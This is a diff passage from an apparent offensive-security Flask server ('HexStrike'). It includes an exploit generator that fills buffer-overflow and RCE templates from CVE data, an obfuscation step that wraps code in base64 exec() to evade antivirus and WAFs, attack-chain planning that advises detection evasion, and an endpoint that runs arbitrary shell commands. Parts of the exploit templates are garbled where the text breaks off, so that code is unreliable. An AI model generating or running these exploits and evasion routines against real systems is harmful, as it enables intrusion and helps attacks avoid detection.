execute(self) -> Dict[str, Any]: """Execute the command with enhanced monitoring and output""" self.start_time = time.time() - + logger.info(f"๐Ÿš€ EXECUTING: {self.command}") logger.info(f"โฑ๏ธ TIMEOUT: {self.timeout}s | PID: Starting...") - + try: self.process = subprocess.Popen( self.command, @@ -6222,13 +6222,13 @@ class EnhancedCommandExecutor: text=True, bufsize=1 ) - + pid = self.process.pid logger.info(f"๐Ÿ†” PROCESS: PID {pid} started") - + # Register process with ProcessManager (v5.0 enhancement) ProcessManager.register_process(pid, self.command, self.process) - + # Start threads to read output continuously self.stdout_thread = threading.Thread(target=self._read_stdout) self.stderr_thread = threading.Thread(target=self._read_stderr) @@ -6236,41 +6236,41 @@ class EnhancedCommandExecutor: self.stderr_thread.daemon = True self.stdout_thread.start() self.stderr_thread.start() - + # Start progress tracking in a separate thread progress_thread = threading.Thread(target=self._show_progress, args=(self.timeout,)) progress_thread.daemon = True progress_thread.start() - + # Wait for the process to complete or timeout try: self.return_code = self.process.wait(timeout=self.timeout) self.end_time = time.time() - + # Process completed, join the threads self.stdout_thread.join(timeout=1) self.stderr_thread.join(timeout=1) - + execution_time = self.end_time - self.start_time - + # Cleanup process from registry (v5.0 enhancement) ProcessManager.cleanup_process(pid) - + if self.return_code == 0: logger.info(f"โœ… SUCCESS: Command completed | Exit Code: {self.return_code} | Duration: {execution_time:.2f}s") telemetry.record_execution(True, execution_time) else: logger.warning(f"โš ๏ธ WARNING: Command completed with errors | Exit Code: {self.return_code} | Duration: {execution_time:.2f}s") telemetry.record_execution(False, execution_time) - + except subprocess.TimeoutExpired: self.end_time = time.time() execution_time = self.end_time - self.start_time - + # Process timed out but we might have partial results self.timed_out = True logger.warning(f"โฐ TIMEOUT: Command timed out after {self.timeout}s | Terminating PID {self.process.pid}") - + # Try to terminate gracefully first self.process.terminate() try: @@ -6279,22 +6279,22 @@ class EnhancedCommandExecutor: # Force kill if it doesn't terminate logger.error(f"๐Ÿ”ช FORCE KILL: Process {self.process.pid} not responding to termination") self.process.kill() - + self.return_code = -1 telemetry.record_execution(False, execution_time) - + # Always consider it a success if we have output, even with timeout success = True if self.timed_out and (self.stdout_data or self.stderr_data) else (self.return_code == 0) - + # Log enhanced final results with summary using ModernVisualEngine output_size = len(self.stdout_data) + len(self.stderr_data) execution_time = self.end_time - self.start_time if self.end_time else 0 - + # Create status summary status_icon = "โœ…" if success else "โŒ" status_color = ModernVisualEngine.COLORS['MATRIX_GREEN'] if success else ModernVisualEngine.COLORS['HACKER_RED'] timeout_status = f" {ModernVisualEngine.COLORS['WARNING']}[TIMEOUT]{ModernVisualEngine.COLORS['RESET']}" if self.timed_out else "" - + # Create beautiful results summary results_summary = f""" 
{ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} @@ -6307,12 +6307,12 @@ class EnhancedCommandExecutor: {ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {status_color}๐Ÿ“ˆ Status:{ModernVisualEngine.COLORS['RESET']} {'SUCCESS' if success else 'FAILED'} | Cached: Yes {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ - + # Log the beautiful summary for line in results_summary.strip().split('\n'): if line.strip(): logger.info(line) - + return { "stdout": self.stdout_data, "stderr": self.stderr_data, @@ -6323,15 +6323,15 @@ class EnhancedCommandExecutor: "execution_time": self.end_time - self.start_time if self.end_time else 0, "timestamp": datetime.now().isoformat() } - + except Exception as e: self.end_time = time.time() execution_time = self.end_time - self.start_time if self.start_time else 0 - + logger.error(f"๐Ÿ’ฅ ERROR: Command execution failed: {str(e)}") logger.error(f"๐Ÿ” TRACEBACK: {traceback.format_exc()}") telemetry.record_execution(False, execution_time) - + return { "stdout": self.stdout_data, "stderr": f"Error executing command: {str(e)}\n{self.stderr_data}", @@ -6350,24 +6350,24 @@ class EnhancedCommandExecutor: # ============================================================================ # AI-POWERED EXPLOIT GENERATION SYSTEM (v6.0 ENHANCEMENT) # ============================================================================ -# +# # This section contains advanced AI-powered exploit generation capabilities # for automated vulnerability exploitation and proof-of-concept development. 
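#
# The flow below is template-driven: _classify_vulnerability() buckets the
# CVE description into a vulnerability type, _select_template() picks a
# matching template string, and generate_exploit_from_cve() fills it via
# str.format(**exploit_params). A minimal sketch of that mechanism, using a
# hypothetical template and placeholder values rather than one of the real
# templates defined below:
#
#     template = 'curl -s {url} -d "{param}={payload}"'
#     poc = template.format(url="http://203.0.113.5", param="cmd", payload="id")
#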
-# +# # Features: # - Automated exploit template generation from CVE data # - Multi-architecture support (x86, x64, ARM) # - Evasion technique integration # - Custom payload generation # - Exploit effectiveness scoring -# +# # ============================================================================ class AIExploitGenerator: """AI-powered exploit development and enhancement system""" - + def __init__(self): # Extend existing payload templates self.exploit_templates = { @@ -6384,15 +6384,15 @@ def create_exploit(): # Vulnerability details from {cve_id} target_ip = "{target_ip}" target_port = {target_port} - + # Buffer overflow payload padding = "A" * {offset} eip_control = struct.pack(" ") sys.exit(1) - + result = exploit_rce(sys.argv[1], sys.argv[2]) if result: print("Exploit successful!") @@ -6482,43 +6482,43 @@ def create_malicious_payload(command): def send_exploit(target_url, command): payload = create_malicious_payload(command) - + data = {{ "{parameter_name}": payload }} - + response = requests.post(target_url, data=data) return response.text """ } - + self.evasion_techniques = { "encoding": ["url", "base64", "hex", "unicode"], "obfuscation": ["variable_renaming", "string_splitting", "comment_injection"], "av_evasion": ["encryption", "packing", "metamorphism"], "waf_bypass": ["case_variation", "parameter_pollution", "header_manipulation"] } - + def generate_exploit_from_cve(self, cve_data, target_info): """Generate working exploit from CVE data""" try: cve_id = cve_data.get("cve_id", "") description = cve_data.get("description", "").lower() - + # Determine vulnerability type vuln_type = self._classify_vulnerability(description) exploit_template = self._select_template(vuln_type, target_info) - + # Generate exploit parameters exploit_params = self._generate_exploit_parameters(cve_data, target_info, vuln_type) - + # Fill template with parameters exploit_code = exploit_template.format(**exploit_params) - + # Apply evasion techniques if requested if target_info.get("evasion_level", "none") != "none": exploit_code = self._apply_evasion_techniques(exploit_code, target_info) - + return { "success": True, "cve_id": cve_id, @@ -6528,11 +6528,11 @@ def send_exploit(target_url, command): "instructions": self._generate_usage_instructions(vuln_type, exploit_params), "evasion_applied": target_info.get("evasion_level", "none") } - + except Exception as e: logger.error(f"Error generating exploit: {str(e)}") return {"success": False, "error": str(e)} - + def _classify_vulnerability(self, description): """Classify vulnerability type from description""" if any(keyword in description for keyword in ["buffer overflow", "heap overflow", "stack overflow"]): @@ -6547,7 +6547,7 @@ def send_exploit(target_url, command): return "xss" else: return "generic" - + def _select_template(self, vuln_type, target_info): """Select appropriate exploit template""" if vuln_type == "buffer_overflow": @@ -6558,7 +6558,7 @@ def send_exploit(target_url, command): return self.exploit_templates[vuln_type] else: return "# Generic exploit template for {cve_id}\n# Manual development required" - + def _generate_exploit_parameters(self, cve_data, target_info, vuln_type): """Generate parameters for exploit template""" params = { @@ -6568,7 +6568,7 @@ def send_exploit(target_url, command): "target_port": target_info.get("target_port", 80), "command": target_info.get("command", "id"), } - + if vuln_type == "buffer_overflow": params.update({ "offset": target_info.get("offset", 268), @@ -6584,13 +6584,13 @@ def send_exploit(target_url, 
command): "injection_payload": target_info.get("injection_payload", '{"cmd": command}'), "parameter_name": target_info.get("parameter_name", "data") }) - + return params - + def _apply_evasion_techniques(self, exploit_code, target_info): """Apply evasion techniques to exploit code""" evasion_level = target_info.get("evasion_level", "basic") - + if evasion_level == "basic": # Simple string obfuscation exploit_code = exploit_code.replace('"', "'") @@ -6598,9 +6598,9 @@ def send_exploit(target_url, command): elif evasion_level == "advanced": # Advanced obfuscation exploit_code = self._advanced_obfuscation(exploit_code) - + return exploit_code - + def _advanced_obfuscation(self, code): """Apply advanced obfuscation techniques""" # This is a simplified version - real implementation would be more sophisticated @@ -6610,7 +6610,7 @@ import base64 exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) """ return obfuscated - + def _generate_usage_instructions(self, vuln_type, params): """Generate usage instructions for the exploit""" instructions = [ @@ -6626,7 +6626,7 @@ exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) "## Testing:", f"python3 exploit.py {params.get('target_ip', '')} {params.get('target_port', '')}" ] - + if vuln_type == "buffer_overflow": instructions.extend([ "", @@ -6636,12 +6636,12 @@ exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) "- Verify addresses match target binary", "- Disable ASLR for testing: echo 0 > /proc/sys/kernel/randomize_va_space" ]) - + return "\n".join(instructions) class VulnerabilityCorrelator: """Correlate vulnerabilities for multi-stage attack chain discovery""" - + def __init__(self): self.attack_patterns = { "privilege_escalation": ["local", "kernel", "suid", "sudo"], @@ -6650,28 +6650,28 @@ class VulnerabilityCorrelator: "lateral_movement": ["smb", "wmi", "ssh", "rdp"], "data_exfiltration": ["file", "database", "memory", "network"] } - + self.software_relationships = { "windows": ["iis", "office", "exchange", "sharepoint"], "linux": ["apache", "nginx", "mysql", "postgresql"], "web": ["php", "nodejs", "python", "java"], "database": ["mysql", "postgresql", "oracle", "mssql"] } - + def find_attack_chains(self, target_software, max_depth=3): """Find multi-vulnerability attack chains""" try: # This is a simplified implementation # Real version would use graph algorithms and ML - + chains = [] - + # Example attack chain discovery logic base_software = target_software.lower() - + # Find initial access vulnerabilities initial_vulns = self._find_vulnerabilities_by_pattern(base_software, "remote_execution") - + for initial_vuln in initial_vulns[:3]: # Limit for demo chain = { "chain_id": f"chain_{len(chains) + 1}", @@ -6687,7 +6687,7 @@ class VulnerabilityCorrelator: "overall_probability": 0.75, "complexity": "MEDIUM" } - + # Find privilege escalation priv_esc_vulns = self._find_vulnerabilities_by_pattern(base_software, "privilege_escalation") if priv_esc_vulns: @@ -6698,7 +6698,7 @@ class VulnerabilityCorrelator: "success_probability": 0.60 }) chain["overall_probability"] *= 0.60 - + # Find persistence persistence_vulns = self._find_vulnerabilities_by_pattern(base_software, "persistence") if persistence_vulns and len(chain["stages"]) < max_depth: @@ -6709,9 +6709,9 @@ class VulnerabilityCorrelator: "success_probability": 0.80 }) chain["overall_probability"] *= 0.80 - + chains.append(chain) - + return { "success": True, "target_software": target_software, @@ -6719,11 +6719,11 @@ class 
VulnerabilityCorrelator: "attack_chains": chains, "recommendation": self._generate_chain_recommendations(chains) } - + except Exception as e: logger.error(f"Error finding attack chains: {str(e)}") return {"success": False, "error": str(e)} - + def _find_vulnerabilities_by_pattern(self, software, pattern_type): """Find vulnerabilities matching attack pattern""" # Simplified mock data - real implementation would query CVE database @@ -6741,14 +6741,14 @@ class VulnerabilityCorrelator: "exploitability": "MEDIUM" } ] - + return mock_vulnerabilities - + def _generate_chain_recommendations(self, chains): """Generate recommendations for attack chains""" if not chains: return "No viable attack chains found for target" - + recommendations = [ f"Found {len(chains)} potential attack chains", f"Highest probability chain: {max(chains, key=lambda x: x['overall_probability'])['overall_probability']:.2%}", @@ -6757,7 +6757,7 @@ class VulnerabilityCorrelator: "- Prepare fallback methods for each stage", "- Consider detection evasion at each stage" ] - + return "\n".join(recommendations) # Global intelligence managers @@ -6768,60 +6768,60 @@ vulnerability_correlator = VulnerabilityCorrelator() def execute_command(command: str, use_cache: bool = True) -> Dict[str, Any]: """ Execute a shell command with enhanced features - + Args: command: The command to execute use_cache: Whether to use caching for this command - + Returns: A dictionary containing the stdout, stderr, return code, and metadata """ - + # Check cache first if use_cache: cached_result = cache.get(command, {}) if cached_result: return cached_result - + # Execute command executor = EnhancedCommandExecutor(command) result = executor.execute() - + # Cache successful results if use_cache and result.get("success", False): cache.set(command, {}, result) - + return result -def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict[str, Any] = None, +def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict[str, Any] = None, use_cache: bool = True, max_attempts: int = 3) -> Dict[str, Any]: """ Execute a command with intelligent error handling and recovery - + Args: tool_name: Name of the tool being executed command: The command to execute parameters: Tool parameters for context use_cache: Whether to use caching max_attempts: Maximum number of recovery attempts - + Returns: A dictionary containing execution results with recovery information """ if parameters is None: parameters = {} - + attempt_count = 0 last_error = None recovery_history = [] - + while attempt_count < max_attempts: attempt_count += 1 - + try: # Execute the command result = execute_command(command, use_cache) - + # Check if execution was successful if result.get("success", False): # Add recovery information to successful result @@ -6831,11 +6831,11 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "recovery_history": recovery_history } return result - + # Command failed, determine if we should attempt recovery error_message = result.get("stderr", "Unknown error") exception = Exception(error_message) - + # Create context for error handler context = { "target": parameters.get("target", "unknown"), @@ -6843,7 +6843,7 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "attempt_count": attempt_count, "command": command } - + # Get recovery strategy from error handler recovery_strategy = error_handler.handle_tool_failure(tool_name, exception, context) recovery_history.append({ @@ 
-6852,35 +6852,35 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "recovery_action": recovery_strategy.action.value, "timestamp": datetime.now().isoformat() }) - + # Apply recovery strategy if recovery_strategy.action == RecoveryAction.RETRY_WITH_BACKOFF: delay = recovery_strategy.parameters.get("initial_delay", 5) backoff = recovery_strategy.parameters.get("max_delay", 60) actual_delay = min(delay * (recovery_strategy.backoff_multiplier ** (attempt_count - 1)), backoff) - + retry_info = f'Retrying in {actual_delay}s (attempt {attempt_count}/{max_attempts})' logger.info(f"{ModernVisualEngine.format_tool_status(tool_name, 'RECOVERY', retry_info)}") time.sleep(actual_delay) continue - + elif recovery_strategy.action == RecoveryAction.RETRY_WITH_REDUCED_SCOPE: # Adjust parameters to reduce scope adjusted_params = error_handler.auto_adjust_parameters( - tool_name, + tool_name, error_handler.classify_error(error_message, exception), parameters ) - + # Rebuild command with adjusted parameters command = _rebuild_command_with_params(tool_name, command, adjusted_params) logger.info(f"๐Ÿ”ง Retrying {tool_name} with reduced scope") continue - + elif recovery_strategy.action == RecoveryAction.SWITCH_TO_ALTERNATIVE_TOOL: # Get alternative tool alternative_tool = error_handler.get_alternative_tool(tool_name, recovery_strategy.parameters) - + if alternative_tool: switch_info = f'Switching to alternative: {alternative_tool}' logger.info(f"{ModernVisualEngine.format_tool_status(tool_name, 'RECOVERY', switch_info)}") @@ -6895,17 +6895,17 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict return result else: logger.warning(f"โš ๏ธ No alternative tool found for {tool_name}") - + elif recovery_strategy.action == RecoveryAction.ADJUST_PARAMETERS: # Adjust parameters based on error type error_type = error_handler.classify_error(error_message, exception) adjusted_params = error_handler.auto_adjust_parameters(tool_name, error_type, parameters) - + # Rebuild command with adjusted parameters command = _rebuild_command_with_params(tool_name, command, adjusted_params) logger.info(f"๐Ÿ”ง Retrying {tool_name} with adjusted parameters") continue - + elif recovery_strategy.action == RecoveryAction.ESCALATE_TO_HUMAN: # Create error context for escalation error_context = ErrorContext( @@ -6919,12 +6919,12 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict stack_trace="", system_resources=error_handler._get_system_resources() ) - + escalation_data = error_handler.escalate_to_human( - error_context, + error_context, recovery_strategy.parameters.get("urgency", "medium") ) - + result["human_escalation"] = escalation_data result["recovery_info"] = { "attempts_made": attempt_count, @@ -6933,16 +6933,16 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "human_escalation" } return result - + elif recovery_strategy.action == RecoveryAction.GRACEFUL_DEGRADATION: # Apply graceful degradation operation = _determine_operation_type(tool_name) degraded_result = degradation_manager.handle_partial_failure( - operation, - result, + operation, + result, [tool_name] ) - + degraded_result["recovery_info"] = { "attempts_made": attempt_count, "recovery_applied": True, @@ -6950,7 +6950,7 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "graceful_degradation" } return degraded_result - + elif recovery_strategy.action == 
RecoveryAction.ABORT_OPERATION: logger.error(f"๐Ÿ›‘ Aborting {tool_name} operation after {attempt_count} attempts") result["recovery_info"] = { @@ -6960,13 +6960,13 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "operation_aborted" } return result - + last_error = exception - + except Exception as e: last_error = e logger.error(f"๐Ÿ’ฅ Unexpected error in recovery attempt {attempt_count}: {str(e)}") - + # If this is the last attempt, escalate to human if attempt_count >= max_attempts: error_context = ErrorContext( @@ -6980,9 +6980,9 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict stack_trace=traceback.format_exc(), system_resources=error_handler._get_system_resources() ) - + escalation_data = error_handler.escalate_to_human(error_context, "high") - + return { "success": False, "error": str(e), @@ -6994,7 +6994,7 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "human_escalation_after_failure" } } - + # All attempts exhausted logger.error(f"๐Ÿšซ All recovery attempts exhausted for {tool_name}") return { @@ -7013,7 +7013,7 @@ def _rebuild_command_with_params(tool_name: str, original_command: str, new_para # This is a simplified implementation - in practice, you'd need tool-specific logic # For now, we'll just append new parameters additional_args = [] - + for key, value in new_params.items(): if key == "timeout" and tool_name in ["nmap", "gobuster", "nuclei"]: additional_args.append(f"--timeout {value}") @@ -7027,17 +7027,17 @@ def _rebuild_command_with_params(tool_name: str, original_command: str, new_para additional_args.append(f"-c {value}") elif key == "rate-limit" and tool_name == "nuclei": additional_args.append(f"-rl {value}") - + if additional_args: return f"{original_command} {' '.join(additional_args)}" - + return original_command def _determine_operation_type(tool_name: str) -> str: """Determine operation type based on tool name""" operation_mapping = { "nmap": "network_discovery", - "rustscan": "network_discovery", + "rustscan": "network_discovery", "masscan": "network_discovery", "gobuster": "web_discovery", "feroxbuster": "web_discovery", @@ -7053,85 +7053,85 @@ def _determine_operation_type(tool_name: str) -> str: "paramspider": "parameter_discovery", "x8": "parameter_discovery" } - + return operation_mapping.get(tool_name, "unknown_operation") # File Operations Manager class FileOperationsManager: """Handle file operations with security and validation""" - + def __init__(self, base_dir: str = "/tmp/hexstrike_files"): self.base_dir = Path(base_dir) self.base_dir.mkdir(exist_ok=True) self.max_file_size = 100 * 1024 * 1024 # 100MB - + def create_file(self, filename: str, content: str, binary: bool = False) -> Dict[str, Any]: """Create a file with the specified content""" try: file_path = self.base_dir / filename file_path.parent.mkdir(parents=True, exist_ok=True) - + if len(content.encode()) > self.max_file_size: return {"success": False, "error": f"File size exceeds {self.max_file_size} bytes"} - + mode = "wb" if binary else "w" with open(file_path, mode) as f: if binary: f.write(content.encode() if isinstance(content, str) else content) else: f.write(content) - + logger.info(f"๐Ÿ“„ Created file: {filename} ({len(content)} bytes)") return {"success": True, "path": str(file_path), "size": len(content)} - + except Exception as e: logger.error(f"โŒ Error creating file {filename}: {e}") return {"success": False, "error": str(e)} - + def 
modify_file(self, filename: str, content: str, append: bool = False) -> Dict[str, Any]: """Modify an existing file""" try: file_path = self.base_dir / filename if not file_path.exists(): return {"success": False, "error": "File does not exist"} - + mode = "a" if append else "w" with open(file_path, mode) as f: f.write(content) - + logger.info(f"โœ๏ธ Modified file: {filename}") return {"success": True, "path": str(file_path)} - + except Exception as e: logger.error(f"โŒ Error modifying file {filename}: {e}") return {"success": False, "error": str(e)} - + def delete_file(self, filename: str) -> Dict[str, Any]: """Delete a file or directory""" try: file_path = self.base_dir / filename if not file_path.exists(): return {"success": False, "error": "File does not exist"} - + if file_path.is_dir(): shutil.rmtree(file_path) else: file_path.unlink() - + logger.info(f"๐Ÿ—‘๏ธ Deleted: {filename}") return {"success": True} - + except Exception as e: logger.error(f"โŒ Error deleting {filename}: {e}") return {"success": False, "error": str(e)} - + def list_files(self, directory: str = ".") -> Dict[str, Any]: """List files in a directory""" try: dir_path = self.base_dir / directory if not dir_path.exists(): return {"success": False, "error": "Directory does not exist"} - + files = [] for item in dir_path.iterdir(): files.append({ @@ -7140,9 +7140,9 @@ class FileOperationsManager: "size": item.stat().st_size if item.is_file() else 0, "modified": datetime.fromtimestamp(item.stat().st_mtime).isoformat() }) - + return {"success": True, "files": files} - + except Exception as e: logger.error(f"โŒ Error listing files in {directory}: {e}") return {"success": False, "error": str(e)} @@ -7155,87 +7155,87 @@ file_manager = FileOperationsManager() @app.route("/health", methods=["GET"]) def health_check(): """Health check endpoint with comprehensive tool detection""" - + essential_tools = [ "nmap", "gobuster", "dirb", "nikto", "sqlmap", "hydra", "john", "hashcat" ] - + network_tools = [ "rustscan", "masscan", "autorecon", "nbtscan", "arp-scan", "responder", "nxc", "enum4linux-ng", "rpcclient", "enum4linux" ] - + web_security_tools = [ "ffuf", "feroxbuster", "dirsearch", "dotdotpwn", "xsser", "wfuzz", "gau", "waybackurls", "arjun", "paramspider", "x8", "jaeles", "dalfox", "httpx", "wafw00f", "burpsuite", "zaproxy", "katana", "hakrawler" ] - + vuln_scanning_tools = [ "nuclei", "wpscan", "graphql-scanner", "jwt-analyzer" ] - + password_tools = [ "medusa", "patator", "hash-identifier", "ophcrack", "hashcat-utils" ] - + binary_tools = [ "gdb", "radare2", "binwalk", "ropgadget", "checksec", "objdump", "ghidra", "pwntools", "one-gadget", "ropper", "angr", "libc-database", "pwninit" ] - + forensics_tools = [ "volatility3", "vol", "steghide", "hashpump", "foremost", "exiftool", "strings", "xxd", "file", "photorec", "testdisk", "scalpel", "bulk-extractor", "stegsolve", "zsteg", "outguess" ] - + cloud_tools = [ "prowler", "scout-suite", "trivy", "kube-hunter", "kube-bench", "docker-bench-security", "checkov", "terrascan", "falco", "clair" ] - + osint_tools = [ "amass", "subfinder", "fierce", "dnsenum", "theharvester", "sherlock", "social-analyzer", "recon-ng", "maltego", "spiderfoot", "shodan-cli", "censys-cli", "have-i-been-pwned" ] - + exploitation_tools = [ "metasploit", "exploit-db", "searchsploit" ] - + api_tools = [ "api-schema-analyzer", "postman", "insomnia", "curl", "httpie", "anew", "qsreplace", "uro" ] - + wireless_tools = [ "kismet", "wireshark", "tshark", "tcpdump" ] - + additional_tools = [ "smbmap", 
"volatility", "sleuthkit", "autopsy", "evil-winrm", "paramspider", "airmon-ng", "airodump-ng", "aireplay-ng", "aircrack-ng", "msfvenom", "msfconsole", "graphql-scanner", "jwt-analyzer" ] - + all_tools = ( essential_tools + network_tools + web_security_tools + vuln_scanning_tools + password_tools + binary_tools + forensics_tools + cloud_tools + osint_tools + exploitation_tools + api_tools + wireless_tools + additional_tools ) tools_status = {} - + for tool in all_tools: try: result = execute_command(f"which {tool}", use_cache=True) tools_status[tool] = result["success"] except: tools_status[tool] = False - + all_essential_tools_available = all(tools_status[tool] for tool in essential_tools) - + category_stats = { "essential": {"total": len(essential_tools), "available": sum(1 for tool in essential_tools if tools_status.get(tool, False))}, "network": {"total": len(network_tools), "available": sum(1 for tool in network_tools if tools_status.get(tool, False))}, @@ -7251,7 +7251,7 @@ def health_check(): "wireless": {"total": len(wireless_tools), "available": sum(1 for tool in wireless_tools if tools_status.get(tool, False))}, "additional": {"total": len(additional_tools), "available": sum(1 for tool in additional_tools if tools_status.get(tool, False))} } - + return jsonify({ "status": "healthy", "message": "HexStrike AI Tools API Server is operational", @@ -7273,13 +7273,13 @@ def generic_command(): params = request.json command = params.get("command", "") use_cache = params.get("use_cache", True) - + if not command: logger.warning("โš ๏ธ Command endpoint called without command parameter") return jsonify({ "error": "Command parameter is required" }), 400 - + result = execute_command(command, use_cache=use_cache) return jsonify(result) except Exception as e: @@ -7299,10 +7299,10 @@ def create_file(): filename = params.get("filename", "") content = params.get("content", "") binary = params.get("binary", False) - + if not filename: return jsonify({"error": "Filename is required"}), 400 - + result = file_manager.create_file(filename, content, binary) return jsonify(result) except Exception as e: @@ -7317,10 +7317,10 @@ def modify_file(): filename = params.get("filename", "") content = params.get("content", "") append = params.get("append", False) - + if not filename: return jsonify({"error": "Filename is required"}), 400 - + result = file_manager.modify_file(filename, content, append) return jsonify(result) except Exception as e: @@ -7333,10 +7333,10 @@ def delete_file(): try: params = request.json filename = params.get("filename", "") - + if not filename: return jsonify({"error": "Filename is required"}), 400 - + result = file_manager.delete_file(filename) return jsonify(result) except Exception as e: @@ -7364,10 +7364,10 @@ def generate_payload(): size = params.get("size", 1024) pattern = params.get("pattern", "A") filename = params.get("filename", f"payload_{int(time.time())}") - + if size > 100 * 1024 * 1024: # 100MB limit return jsonify({"error": "Payload size too large (max 100MB)"}), 400 - + if payload_type == "buffer": content = pattern * (size // len(pattern)) elif payload_type == "cyclic": @@ -7382,14 +7382,14 @@ def generate_payload(): content = ''.join(random.choices(string.ascii_letters + string.digits, k=size)) else: return jsonify({"error": "Invalid payload type"}), 400 - + result = file_manager.create_file(filename, content) result["payload_info"] = { "type": payload_type, "size": size, "pattern": pattern } - + logger.info(f"๐ŸŽฏ Generated {payload_type} payload: {filename} 
({size} bytes)") return jsonify(result) except Exception as e: @@ -7425,18 +7425,18 @@ def list_processes(): """List all active processes""" try: processes = ProcessManager.list_active_processes() - + # Add calculated fields for each process for pid, info in processes.items(): runtime = time.time() - info["start_time"] info["runtime_formatted"] = f"{runtime:.1f}s" - + if info["progress"] > 0: eta = (runtime / info["progress"]) * (1.0 - info["progress"]) info["eta_formatted"] = f"{eta:.1f}s" else: info["eta_formatted"] = "Unknown" - + return jsonify({ "success": True, "active_processes": processes, @@ -7451,18 +7451,18 @@ def get_process_status(pid): """Get status of a specific process""" try: process_info = ProcessManager.get_process_status(pid) - + if process_info: # Add calculated fields runtime = time.time() - process_info["start_time"] process_info["runtime_formatted"] = f"{runtime:.1f}s" - + if process_info["progress"] > 0: eta = (runtime / process_info["progress"]) * (1.0 - process_info["progress"]) process_info["eta_formatted"] = f"{eta:.1f}s" else: process_info["eta_formatted"] = "Unknown" - + return jsonify({ "success": True, "process": process_info @@ -7472,7 +7472,7 @@ def get_process_status(pid): "success": False, "error": f"Process {pid} not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting process status: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7482,7 +7482,7 @@ def terminate_process(pid): """Terminate a specific process""" try: success = ProcessManager.terminate_process(pid) - + if success: logger.info(f"๐Ÿ›‘ Process {pid} terminated successfully") return jsonify({ @@ -7494,7 +7494,7 @@ def terminate_process(pid): "success": False, "error": f"Failed to terminate process {pid} or process not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7504,7 +7504,7 @@ def pause_process(pid): """Pause a specific process""" try: success = ProcessManager.pause_process(pid) - + if success: logger.info(f"โธ๏ธ Process {pid} paused successfully") return jsonify({ @@ -7516,7 +7516,7 @@ def pause_process(pid): "success": False, "error": f"Failed to pause process {pid} or process not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error pausing process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7526,7 +7526,7 @@ def resume_process(pid): """Resume a paused process""" try: success = ProcessManager.resume_process(pid) - + if success: logger.info(f"โ–ถ๏ธ Process {pid} resumed successfully") return jsonify({ @@ -7538,7 +7538,7 @@ def resume_process(pid): "success": False, "error": f"Failed to resume process {pid} or process not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error resuming process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7549,10 +7549,10 @@ def process_dashboard(): try: processes = ProcessManager.list_active_processes() current_time = time.time() - + # Create beautiful dashboard using ModernVisualEngine dashboard_visual = ModernVisualEngine.create_live_dashboard(processes) - + dashboard = { "timestamp": datetime.now().isoformat(), "total_processes": len(processes), @@ -7564,19 +7564,19 @@ def process_dashboard(): "active_connections": len(psutil.net_connections()) } } - + for pid, info in processes.items(): runtime = current_time - info["start_time"] progress_fraction = info.get("progress", 0) - + # 
